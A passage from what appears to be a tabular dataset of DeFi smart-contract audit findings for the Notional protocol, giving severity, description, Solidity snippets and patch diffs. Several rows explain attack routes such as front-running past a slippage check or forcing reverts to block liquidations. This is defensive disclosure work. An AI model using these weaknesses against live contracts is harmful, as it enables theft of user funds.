transaction will be reverted due to ""Trade failed, slippage."" Subsequently, if Alice front-runs by invoking `mint` to create some 
shares before the lender, the lender's transaction will succeed. Therefore, the lender's `minImpliedRate` check will be bypassed, leading to a loss of funds for the lender.","add a check inside `_mintInternal`\\n```\\n if (maxFCash < fCashAmount) {\\n// Add the line below\\n require(minImpliedRate ==0,""Trade failed, slippage""); \\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);//@audit-info fCashAmount * (underlyingTokenDecimals) / 1e8\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);//@audit check this.\\n }\\n```\\n",lender lost of funds,"```\\n function mintViaUnderlying(\\n uint256 depositAmountExternal,\\n uint88 fCashAmount,\\n address receiver,\\n uint32 minImpliedRate//@audit when lendAmount bigger than maxFCash lack of minRate protect.\\n ) external override {\\n (/* */, uint256 maxFCash) = getTotalFCashAvailable();\\n _mintInternal(depositAmountExternal, fCashAmount, receiver, minImpliedRate, maxFCash);\\n }\\n```\\n" +Residual ETH will not be sent back to users during the minting of wfCash,high,"Residual ETH will not be sent back to users, resulting in a loss of assets.\\nAt Line 67, residual ETH within the `depositUnderlyingToken` function will be sent as Native ETH back to the `msg.sender`, which is this wfCash Wrapper contract.\\n```\\nFile: wfCashLogic.sol\\n function _mintInternal(\\n..SNIP..\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION); \\n require(fCashAmountExternal <= depositAmountExternal); \\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n 
NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n..SNIP..\\n // Residual tokens will be sent back to msg.sender, not the receiver. The msg.sender\\n // was used to transfer tokens in and these are any residual tokens left that were not\\n // lent out. Sending these tokens back to the receiver risks them getting locked on a\\n // contract that does not have the capability to transfer them off\\n _sendTokensToReceiver(token, msg.sender, isETH, balanceBefore);\\n```\\n\\nWithin the `depositUnderlyingToken` function Line 108 below, the `returnExcessWrapped` parameter is set to `false`, which means it will not wrap the residual ETH, and that Native ETH will be sent back to the caller (wrapper contract)\\n```\\nFile: AccountAction.sol\\n function depositUnderlyingToken(\\n address account,\\n uint16 currencyId,\\n uint256 amountExternalPrecision\\n ) external payable nonReentrant returns (uint256) {\\n..SNIP..\\nFile: AccountAction.sol\\n int256 primeCashReceived = balanceState.depositUnderlyingToken(\\n msg.sender,\\n SafeInt256.toInt(amountExternalPrecision),\\n false // there should never be excess ETH here by definition\\n );\\n```\\n\\nbalanceBefore = amount of WETH before the deposit, balanceAfter = amount of WETH after the deposit.\\nWhen the `_sendTokensToReceiver` is executed, these two values are going to be the same since it is Native ETH that is sent to the wrapper instead of WETH. As a result, the Native ETH that the wrapper received is not forwarded to the users.\\n```\\nFile: wfCashLogic.sol\\n function _sendTokensToReceiver( \\n IERC20 token,\\n address receiver,\\n bool isETH,\\n uint256 balanceBefore\\n ) private returns (uint256 tokensTransferred) {\\n uint256 balanceAfter = isETH ? 
WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n tokensTransferred = balanceAfter - balanceBefore; \\n\\n if (isETH) {\\n // No need to use safeTransfer for WETH since it is known to be compatible\\n IERC20(address(WETH)).transfer(receiver, tokensTransferred); \\n } else if (tokensTransferred > 0) { \\n token.safeTransfer(receiver, tokensTransferred); \\n }\\n }\\n```\\n","If the underlying is ETH, measure the Native ETH balance before and after the `depositUnderlyingToken` is executed. Forward any residual Native ETH to the users, if any.",Loss of assets as the residual ETH is not sent to the users.,"```\\nFile: wfCashLogic.sol\\n function _mintInternal(\\n..SNIP..\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION); \\n require(fCashAmountExternal <= depositAmountExternal); \\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n..SNIP..\\n // Residual tokens will be sent back to msg.sender, not the receiver. The msg.sender\\n // was used to transfer tokens in and these are any residual tokens left that were not\\n // lent out. Sending these tokens back to the receiver risks them getting locked on a\\n // contract that does not have the capability to transfer them off\\n _sendTokensToReceiver(token, msg.sender, isETH, balanceBefore);\\n```\\n" +Residual ETH not sent back when `batchBalanceAndTradeAction` executed,high,"Residual ETH was not sent back when `batchBalanceAndTradeAction` function was executed, resulting in a loss of assets.\\nPer the comment at Line 122 below, when there is residual ETH, native ETH will be sent from Notional V3 to the wrapper contract. 
In addition, per the comment at Line 109, it is often the case to have an excess amount to be refunded to the users.\\n```\\nFile: wfCashLogic.sol\\n function _lendLegacy(\\nFile: wfCashLogic.sol\\n // If deposit amount external is in excess of the cost to purchase fCash amount (often the case),\\n // then we need to return the difference between postTradeCash - preTradeCash. This is done because\\n // the encoded trade does not automatically withdraw the entire cash balance in case the wrapper\\n // is holding a cash balance.\\n uint256 preTradeCash = getCashBalance();\\n\\n BalanceActionWithTrades[] memory action = EncodeDecode.encodeLegacyLendTrade(\\n currencyId,\\n getMarketIndex(),\\n depositAmountExternal,\\n fCashAmount,\\n minImpliedRate\\n );\\n // Notional will return any residual ETH as the native token. When we _sendTokensToReceiver those\\n // native ETH tokens will be wrapped back to WETH.\\n NotionalV2.batchBalanceAndTradeAction{value: msgValue}(address(this), action); \\n\\n uint256 postTradeCash = getCashBalance(); \\n\\n if (preTradeCash != postTradeCash) { \\n // If ETH, then redeem to WETH (redeemToUnderlying == false)\\n NotionalV2.withdraw(currencyId, _safeUint88(postTradeCash - preTradeCash), !isETH);\\n }\\n }\\n```\\n\\nThis is due to how the `depositUnderlyingExternal` function within Notional V3 is implemented. The `batchBalanceAndTradeAction` will trigger the `depositUnderlyingExternal` function. 
Within the `depositUnderlyingExternal` function at Line 196, excess ETH will be transferred back to the account (wrapper address) in Native ETH term.\\nNote that for other ERC20 tokens, such as DAI or USDC, the excess will be added to the wrapper's cash balance, and this issue will not occur.\\n```\\nFile: TokenHandler.sol\\n function depositUnderlyingExternal(\\n address account,\\n uint16 currencyId,\\n int256 _underlyingExternalDeposit,\\n PrimeRate memory primeRate,\\n bool returnNativeTokenWrapped\\n ) internal returns (int256 actualTransferExternal, int256 netPrimeSupplyChange) {\\n uint256 underlyingExternalDeposit = _underlyingExternalDeposit.toUint();\\n if (underlyingExternalDeposit == 0) return (0, 0);\\n\\n Token memory underlying = getUnderlyingToken(currencyId);\\n if (underlying.tokenType == TokenType.Ether) {\\n // Underflow checked above\\n if (underlyingExternalDeposit < msg.value) {\\n // Transfer any excess ETH back to the account\\n GenericToken.transferNativeTokenOut(\\n account, msg.value - underlyingExternalDeposit, returnNativeTokenWrapped\\n );\\n } else {\\n require(underlyingExternalDeposit == msg.value, ""ETH Balance"");\\n }\\n\\n actualTransferExternal = _underlyingExternalDeposit;\\n```\\n\\nIn the comment, it mentioned that any residual ETH in native token will be wrapped back to WETH by the `_sendTokensToReceiver`.\\n```\\nFile: wfCashLogic.sol\\n function _lendLegacy(\\n..SNIP..\\n // Notional will return any residual ETH as the native token. When we _sendTokensToReceiver those\\n // native ETH tokens will be wrapped back to WETH.\\n```\\n\\nHowever, the current implementation of the `_sendTokensToReceiver`, as shown below, does not wrap the Native ETH to WETH. 
Thus, the residual ETH will not be sent back to the users and stuck in the contract.\\n```\\nFile: wfCashLogic.sol\\n function _sendTokensToReceiver( \\n IERC20 token,\\n address receiver,\\n bool isETH,\\n uint256 balanceBefore\\n ) private returns (uint256 tokensTransferred) {\\n uint256 balanceAfter = isETH ? WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n tokensTransferred = balanceAfter - balanceBefore; \\n\\n if (isETH) {\\n // No need to use safeTransfer for WETH since it is known to be compatible\\n IERC20(address(WETH)).transfer(receiver, tokensTransferred); \\n } else if (tokensTransferred > 0) { \\n token.safeTransfer(receiver, tokensTransferred); \\n }\\n }\\n```\\n","If the underlying is ETH, measure the Native ETH balance before and after the `batchBalanceAndTradeAction` is executed. Forward any residual Native ETH to the users, if any.",Loss of assets as the residual ETH is not sent to the users.,"```\\nFile: wfCashLogic.sol\\n function _lendLegacy(\\nFile: wfCashLogic.sol\\n // If deposit amount external is in excess of the cost to purchase fCash amount (often the case),\\n // then we need to return the difference between postTradeCash - preTradeCash. This is done because\\n // the encoded trade does not automatically withdraw the entire cash balance in case the wrapper\\n // is holding a cash balance.\\n uint256 preTradeCash = getCashBalance();\\n\\n BalanceActionWithTrades[] memory action = EncodeDecode.encodeLegacyLendTrade(\\n currencyId,\\n getMarketIndex(),\\n depositAmountExternal,\\n fCashAmount,\\n minImpliedRate\\n );\\n // Notional will return any residual ETH as the native token. 
When we _sendTokensToReceiver those\\n // native ETH tokens will be wrapped back to WETH.\\n NotionalV2.batchBalanceAndTradeAction{value: msgValue}(address(this), action); \\n\\n uint256 postTradeCash = getCashBalance(); \\n\\n if (preTradeCash != postTradeCash) { \\n // If ETH, then redeem to WETH (redeemToUnderlying == false)\\n NotionalV2.withdraw(currencyId, _safeUint88(postTradeCash - preTradeCash), !isETH);\\n }\\n }\\n```\\n" +_isExternalLendingUnhealthy() using stale factors,medium,"In `checkRebalance()` -> _isExternalLendingUnhealthy() -> getTargetExternalLendingAmount(factors) using stale `factors` will lead to inaccurate `targetAmount`, which in turn will cause `checkRebalance()` that should have been rebalance to not execute.\\nrebalancingBot uses `checkRebalance()` to return the `currencyIds []` that need to be `rebalance`.\\ncall order : `checkRebalance()` -> `_isExternalLendingUnhealthy()` -> `ExternalLending.getTargetExternalLendingAmount(factors)`\\n```\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n// rest of code\\n\\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n );\\n```\\n\\nA very important logic is to get `targetAmount`. The calculation of this value depends on `factors`. But currently used is PrimeCashFactors memory `factors` = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);. This is not the latest. It has not been aggregated yet. 
The correct one should be `( /* */,factors) = PrimeCashExchangeRate.getPrimeCashRateView();`.","```\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n// rest of code\\n\\n// Remove the line below\\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);\\n// Add the line below\\n ( /* */,PrimeCashFactors memory factors) = PrimeCashExchangeRate.getPrimeCashRateView();\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n );\\n```\\n","Due to the incorrect `targetAmount`, it may cause the `currencyId` that should have been re-executed `Rebalance` to not execute `rebalance`, increasing the risk of the protocol.","```\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n// rest of code\\n\\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n );\\n```\\n" +recover() using the standard transfer may not be able to retrieve some tokens,medium,"in `SecondaryRewarder.recover()` Using the standard `IERC20.transfer()` If `REWARD_TOKEN` is like `USDT`, it will not be able to transfer out, because this kind of `token` does not return `bool` This will cause it to always `revert`\\n`SecondaryRewarder.recover()` use for\\nAllows the Notional owner to recover any tokens 
sent to the address or any reward tokens remaining on the contract in excess of the total rewards emitted.\\n```\\n function recover(address token, uint256 amount) external onlyOwner {\\n if (Constants.ETH_ADDRESS == token) {\\n (bool status,) = msg.sender.call{value: amount}("""");\\n require(status);\\n } else {\\n IERC20(token).transfer(msg.sender, amount);\\n }\\n }\\n```\\n\\nUsing the standard `IERC20.transfer()` method to execute the transfer A `token` of a type similar to `USDT` has no return value This will cause the execution of the transfer to always fail","```\\n function recover(address token, uint256 amount) external onlyOwner {\\n if (Constants.ETH_ADDRESS == token) {\\n (bool status,) = msg.sender.call{value: amount}("""");\\n require(status);\\n } else {\\n// Remove the line below\\n IERC20(token).transfer(msg.sender, amount);\\n// Add the line below\\n GenericToken.safeTransferOut(token,msg.sender,amount);\\n }\\n }\\n```\\n","If `REWARD_TOKEN` is like `USDT`, it will not be able to transfer out.","```\\n function recover(address token, uint256 amount) external onlyOwner {\\n if (Constants.ETH_ADDRESS == token) {\\n (bool status,) = msg.sender.call{value: amount}("""");\\n require(status);\\n } else {\\n IERC20(token).transfer(msg.sender, amount);\\n }\\n }\\n```\\n" +Malicious users could block liquidation or perform DOS,medium,"The current implementation uses a ""push"" approach where reward tokens are sent to the recipient during every update, which introduces additional attack surfaces that the attackers can exploit. 
An attacker could intentionally affect the outcome of the transfer to gain a certain advantage or carry out certain attack.\\nThe worst-case scenario is that malicious users might exploit this trick to intentionally trigger a revert when someone attempts to liquidate their unhealthy accounts to block the liquidation, leaving the protocol with bad debts and potentially leading to insolvency if it accumulates.\\nPer the Audit Scope Documentation provided by the protocol team on the contest page, the reward tokens can be any arbitrary ERC20 tokens\\nWe are extending this functionality to allow nTokens to be incentivized by a secondary reward token. On Arbitrum, this will be ARB as a result of the ARB STIP grant. In the future, this may be any arbitrary ERC20 token\\nLine 231 of the `_claimRewards` function below might revert due to various issues such as:\\ntokens with blacklisting features such as USDC (users might intentionally get into the blacklist to achieve certain outcomes)\\ntokens with hook, which allow the target to revert the transaction intentionally\\nunexpected error in the token's contract\\n```\\nFile: SecondaryRewarder.sol\\n function _claimRewards(address account, uint256 nTokenBalanceBefore, uint256 nTokenBalanceAfter) private { \\n uint256 rewardToClaim = _calculateRewardToClaim(account, nTokenBalanceBefore, accumulatedRewardPerNToken); \\n\\n // Precision here is:\\n // nTokenBalanceAfter (INTERNAL_TOKEN_PRECISION) \\n // accumulatedRewardPerNToken (INCENTIVE_ACCUMULATION_PRECISION) \\n // DIVIDE BY\\n // INTERNAL_TOKEN_PRECISION \\n // => INCENTIVE_ACCUMULATION_PRECISION (1e18) \\n rewardDebtPerAccount[account] = nTokenBalanceAfter \\n .mul(accumulatedRewardPerNToken)\\n .div(uint256(Constants.INTERNAL_TOKEN_PRECISION))\\n .toUint128(); \\n\\n if (0 < rewardToClaim) { \\n GenericToken.safeTransferOut(REWARD_TOKEN, account, rewardToClaim); \\n emit RewardTransfer(REWARD_TOKEN, account, rewardToClaim);\\n }\\n }\\n```\\n\\nIf a revert occurs, the 
following functions are affected:\\n```\\n_claimRewards -> claimRewardsDirect\\n\\n_claimRewards -> claimRewards -> Incentives.claimIncentives\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler._finalize\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler._finalize -> Used by many functions\\n\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler.claimIncentivesManual\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler.claimIncentivesManual -> nTokenAction.nTokenClaimIncentives (External)\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler.claimIncentivesManual -> nTokenAction.nTokenClaimIncentives (External) -> claimNOTE (External)\\n```\\n","The current implementation uses a ""push"" approach where reward tokens are sent to the recipient during every update, which introduces additional attack surfaces that the attackers can exploit.\\nConsider adopting a pull method for users to claim their rewards instead so that the transfer of reward tokens is disconnected from the updating of reward balances.","Many of the core functionalities of the protocol will be affected by the revert. 
Specifically, the `BalancerHandler._finalize` has the most impact as this function is called by almost every critical functionality of the protocol, including deposit, withdrawal, and liquidation.\\nThe worst-case scenario is that malicious users might exploit this trick to intentionally trigger a revert when someone attempts to liquidate their unhealthy accounts to block the liquidation, leaving the protocol with bad debts and potentially leading to insolvency if it accumulates.","```\\nFile: SecondaryRewarder.sol\\n function _claimRewards(address account, uint256 nTokenBalanceBefore, uint256 nTokenBalanceAfter) private { \\n uint256 rewardToClaim = _calculateRewardToClaim(account, nTokenBalanceBefore, accumulatedRewardPerNToken); \\n\\n // Precision here is:\\n // nTokenBalanceAfter (INTERNAL_TOKEN_PRECISION) \\n // accumulatedRewardPerNToken (INCENTIVE_ACCUMULATION_PRECISION) \\n // DIVIDE BY\\n // INTERNAL_TOKEN_PRECISION \\n // => INCENTIVE_ACCUMULATION_PRECISION (1e18) \\n rewardDebtPerAccount[account] = nTokenBalanceAfter \\n .mul(accumulatedRewardPerNToken)\\n .div(uint256(Constants.INTERNAL_TOKEN_PRECISION))\\n .toUint128(); \\n\\n if (0 < rewardToClaim) { \\n GenericToken.safeTransferOut(REWARD_TOKEN, account, rewardToClaim); \\n emit RewardTransfer(REWARD_TOKEN, account, rewardToClaim);\\n }\\n }\\n```\\n" +Unexpected behavior when calling certain ERC4626 functions,medium,"Unexpected behavior could occur when certain ERC4626 functions are called during the time windows when the fCash has matured but is not yet settled.\\nWhen the fCash has matured, the global settlement does not automatically get executed. The global settlement will only be executed when the first account attempts to settle its own account. 
The code expects the `pr.supplyFactor` to return zero if the global settlement has not been executed yet after maturity.\\nPer the comment at Line 215, the design of the `_getMaturedCashValue` function is that it expects that if fCash has matured AND the fCash has not yet been settled, the `pr.supplyFactor` will be zero. In this case, the cash value will be zero.\\n```\\nFile: wfCashBase.sol\\n function _getMaturedCashValue(uint256 fCashAmount) internal view returns (uint256) { \\n if (!hasMatured()) return 0; \\n // If the fCash has matured we use the cash balance instead.\\n (uint16 currencyId, uint40 maturity) = getDecodedID(); \\n PrimeRate memory pr = NotionalV2.getSettlementRate(currencyId, maturity); \\n\\n // fCash has not yet been settled\\n if (pr.supplyFactor == 0) return 0; \\n..SNIP..\\n```\\n\\nDuring the time window where the fCash has matured, and none of the accounts triggered an account settlement, the `_getMaturedCashValue` function at Line 33 below will return zero, which will result in the `totalAssets()` function returning zero.\\n```\\nFile: wfCashERC4626.sol\\n function totalAssets() public view override returns (uint256) {\\n if (hasMatured()) {\\n // We calculate the matured cash value of the total supply of fCash. This is\\n // not always equal to the cash balance held by the wrapper contract.\\n uint256 primeCashValue = _getMaturedCashValue(totalSupply());\\n require(primeCashValue < uint256(type(int256).max));\\n int256 externalValue = NotionalV2.convertCashBalanceToExternal(\\n getCurrencyId(), int256(primeCashValue), true\\n );\\n return externalValue >= 0 ? uint256(externalValue) : 0;\\n..SNIP..\\n```\\n",Document the unexpected behavior of the affected functions that could occur during the time windows when the fCash has matured but is not yet settled so that anyone who calls these functions is aware of them.,"The `totalAssets()` function is utilized by key ERC4626 functions within the wrapper, such as the following functions. 
The side effects of this issue are documented below:\\n`convertToAssets` (Impact = returned value is always zero assets regardless of the inputs)\\n`convertToAssets` > `previewRedeem` (Impact = returned value is always zero assets regardless of the inputs)\\n`convertToAssets` > `previewRedeem` > `maxWithdraw` (Impact = max withdrawal is always zero)\\n`convertToShares` (Impact = Division by zero error, Revert)\\n`convertToShares` > `previewWithdraw` (Impact = Revert)\\nIn addition, any external protocol integrating with wfCash will be vulnerable within this time window as an invalid result (zero) is returned, or a revert might occur. For instance, any external protocol that relies on any of the above-affected functions for computing the withdrawal/minting amount or collateral value will be greatly impacted as the value before the maturity might be 10000, but it will temporarily reset to zero during this time window. Attackers could take advantage of this time window to perform malicious actions.","```\\nFile: wfCashBase.sol\\n function _getMaturedCashValue(uint256 fCashAmount) internal view returns (uint256) { \\n if (!hasMatured()) return 0; \\n // If the fCash has matured we use the cash balance instead.\\n (uint16 currencyId, uint40 maturity) = getDecodedID(); \\n PrimeRate memory pr = NotionalV2.getSettlementRate(currencyId, maturity); \\n\\n // fCash has not yet been settled\\n if (pr.supplyFactor == 0) return 0; \\n..SNIP..\\n```\\n" +getOracleData() maxExternalDeposit not accurate,medium,"in `getOracleData()` The calculation of `maxExternalDeposit` lacks consideration for `reserve.accruedToTreasury`. 
This leads to `maxExternalDeposit` being too large, causing `Treasury.rebalance()` to fail.\\nin `getOracleData()`\\n```\\n function getOracleData() external view override returns (OracleData memory oracleData) {\\n// rest of code\\n (/* */, uint256 supplyCap) = IPoolDataProvider(POOL_DATA_PROVIDER).getReserveCaps(underlying);\\n // Supply caps are returned as whole token values\\n supplyCap = supplyCap * UNDERLYING_PRECISION;\\n uint256 aTokenSupply = IPoolDataProvider(POOL_DATA_PROVIDER).getATokenTotalSupply(underlying);\\n\\n // If supply cap is zero, that means there is no cap on the pool\\n if (supplyCap == 0) {\\n oracleData.maxExternalDeposit = type(uint256).max;\\n } else if (supplyCap <= aTokenSupply) {\\n oracleData.maxExternalDeposit = 0;\\n } else {\\n // underflow checked as consequence of if / else statement\\n oracleData.maxExternalDeposit = supplyCap - aTokenSupply;\\n }\\n```\\n\\nHowever, AAVE's restrictions are as follows: ValidationLogic.sol#L81-L88\\n```\\n require(\\n supplyCap == 0 ||\\n ((IAToken(reserveCache.aTokenAddress).scaledTotalSupply() +\\n uint256(reserve.accruedToTreasury)).rayMul(reserveCache.nextLiquidityIndex) + amount) <=\\n supplyCap * (10 ** reserveCache.reserveConfiguration.getDecimals()),\\n Errors.SUPPLY_CAP_EXCEEDED\\n );\\n }\\n```\\n\\nThe current implementation lacks subtraction of `uint256(reserve.accruedToTreasury)).rayMul(reserveCache.nextLiquidityIndex)`.",subtract `uint256(reserve.accruedToTreasury)).rayMul(reserveCache.nextLiquidityIndex)`,An overly large `maxExternalDeposit` may cause `rebalance()` to be unable to execute.,"```\\n function getOracleData() external view override returns (OracleData memory oracleData) {\\n// rest of code\\n (/* */, uint256 supplyCap) = IPoolDataProvider(POOL_DATA_PROVIDER).getReserveCaps(underlying);\\n // Supply caps are returned as whole token values\\n supplyCap = supplyCap * UNDERLYING_PRECISION;\\n uint256 aTokenSupply = 
IPoolDataProvider(POOL_DATA_PROVIDER).getATokenTotalSupply(underlying);\\n\\n // If supply cap is zero, that means there is no cap on the pool\\n if (supplyCap == 0) {\\n oracleData.maxExternalDeposit = type(uint256).max;\\n } else if (supplyCap <= aTokenSupply) {\\n oracleData.maxExternalDeposit = 0;\\n } else {\\n // underflow checked as consequence of if / else statement\\n oracleData.maxExternalDeposit = supplyCap - aTokenSupply;\\n }\\n```\\n" +getTargetExternalLendingAmount() when targetUtilization == 0 no check whether enough externalUnderlyingAvailableForWithdraw,medium,"in `getTargetExternalLendingAmount()` When `targetUtilization == 0`, it directly returns `targetAmount=0`. It lacks the judgment of whether there is enough `externalUnderlyingAvailableForWithdraw`. This may cause `_rebalanceCurrency()` to `revert` due to insufficient balance for `withdraw`.\\nwhen `setRebalancingTargets()` , we can setting all the targets to zero to immediately exit money it will call `_rebalanceCurrency() -> _isExternalLendingUnhealthy() -> getTargetExternalLendingAmount()`\\n```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n // Short circuit a zero target\\n if (rebalancingTargetData.targetUtilization == 0) return 0;\\n\\n// rest of code.\\n if (targetAmount < oracleData.currentExternalUnderlyingLend) {\\n uint256 forRedemption = oracleData.currentExternalUnderlyingLend - targetAmount;\\n if (oracleData.externalUnderlyingAvailableForWithdraw < forRedemption) {\\n // increase target amount so that redemptions amount match externalUnderlyingAvailableForWithdraw\\n targetAmount = targetAmount.add(\\n // unchecked - is safe here, overflow is not possible due to above if conditional\\n forRedemption - 
oracleData.externalUnderlyingAvailableForWithdraw\\n );\\n }\\n }\\n```\\n\\nWhen `targetUtilization==0`, it returns `targetAmount ==0`. It lacks the other judgments of whether the current `externalUnderlyingAvailableForWithdraw` is sufficient. Exceeding `externalUnderlyingAvailableForWithdraw` may cause `_rebalanceCurrency()` to revert.\\nFor example: `currentExternalUnderlyingLend = 100` `externalUnderlyingAvailableForWithdraw = 99` If `targetUtilization` is modified to `0`, then `targetAmount` should be `1`, not `0`. `0` will cause an error due to insufficient available balance for withdrawal.\\nSo, it should still try to withdraw as much deposit as possible first, wait for replenishment, and then withdraw the remaining deposit until the deposit is cleared.","Remove `targetUtilization == 0` directly returning 0.\\nThe subsequent logic of the method can handle `targetUtilization == 0` normally and will not cause an error.\\n```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n // Short circuit a zero target\\n// Remove the line below\\n if (rebalancingTargetData.targetUtilization == 0) return 0;\\n```\\n","A too small `targetAmount` may cause AAVE withdraw to fail, thereby causing the inability to `setRebalancingTargets()` to fail.","```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n // Short circuit a zero target\\n if (rebalancingTargetData.targetUtilization == 0) return 0;\\n\\n// rest of code.\\n if (targetAmount < oracleData.currentExternalUnderlyingLend) {\\n uint256 forRedemption = 
oracleData.currentExternalUnderlyingLend - targetAmount;\\n if (oracleData.externalUnderlyingAvailableForWithdraw < forRedemption) {\\n // increase target amount so that redemptions amount match externalUnderlyingAvailableForWithdraw\\n targetAmount = targetAmount.add(\\n // unchecked - is safe here, overflow is not possible due to above if conditional\\n forRedemption - oracleData.externalUnderlyingAvailableForWithdraw\\n );\\n }\\n }\\n```\\n" +getTargetExternalLendingAmount() targetAmount may far less than the correct value,medium,"When calculating `ExternalLending.getTargetExternalLendingAmount()`, it restricts `targetAmount` greater than `oracleData.maxExternalDeposit`. However, it does not take into account that `oracleData.maxExternalDeposit` includes the protocol deposit `currentExternalUnderlyingLend` This may result in the returned quantity being far less than the correct quantity.\\nin `getTargetExternalLendingAmount()` It restricts `targetAmount` greater than `oracleData.maxExternalDeposit`.\\n```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n// rest of code\\n\\n targetAmount = SafeUint256.min(\\n // totalPrimeCashInUnderlying and totalPrimeDebtInUnderlying are in 8 decimals, convert it to native\\n // token precision here for accurate comparison. 
No underflow possible since targetExternalUnderlyingLend\\n // is floored at zero.\\n uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),\\n // maxExternalUnderlyingLend is limit enforced by setting externalWithdrawThreshold\\n // maxExternalDeposit is limit due to the supply cap on external pools\\n SafeUint256.min(maxExternalUnderlyingLend, oracleData.maxExternalDeposit)\\n );\\n```\\n\\nthis is : `targetAmount = min(targetExternalUnderlyingLend, maxExternalUnderlyingLend, oracleData.maxExternalDeposit)`\\nThe problem is that when calculating `oracleData.maxExternalDeposit`, it does not exclude the existing deposit `currentExternalUnderlyingLend` of the current protocol.\\nFor example: `currentExternalUnderlyingLend = 100` `targetExternalUnderlyingLend = 100` `maxExternalUnderlyingLend = 10000` `oracleData.maxExternalDeposit = 0` (All AAVE deposits include the current deposit currentExternalUnderlyingLend)\\nIf according to the current calculation result: `targetAmount=0`, this will result in needing to withdraw `100`. 
(currentExternalUnderlyingLend - targetAmount)\\nIn fact, only when the calculation result needs to increase the `deposit` (targetAmount > currentExternalUnderlyingLend), it needs to be restricted by `maxExternalDeposit`.\\nThe correct one should be neither deposit nor withdraw, that is, `targetAmount=currentExternalUnderlyingLend = 100`.","Only when `targetAmount > currentExternalUnderlyingLend` is a deposit needed, it should be considered that it cannot exceed `oracleData.maxExternalDeposit`\\n```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n// rest of code\\n\\n// Remove the line below\\n targetAmount = SafeUint256.min(\\n// Remove the line below\\n // totalPrimeCashInUnderlying and totalPrimeDebtInUnderlying are in 8 decimals, convert it to native\\n// Remove the line below\\n // token precision here for accurate comparison. 
